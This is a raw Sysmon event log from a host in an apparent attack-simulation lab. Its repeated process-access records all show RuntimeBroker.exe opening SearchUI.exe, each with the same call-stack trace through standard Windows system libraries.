12:02:31.617{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11b6c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+115a9|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006861Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.617{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006860Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.617{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006859Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.617{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006858Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.617{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006857Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.602{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006856Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.602{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006855Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.602{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006854Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.602{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006853Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.602{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006852Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.602{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006851Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.602{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006850Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.602{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006849Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.602{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006848Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.602{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006847Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.602{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006846Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.602{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006845Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.602{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006844Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.602{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006843Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 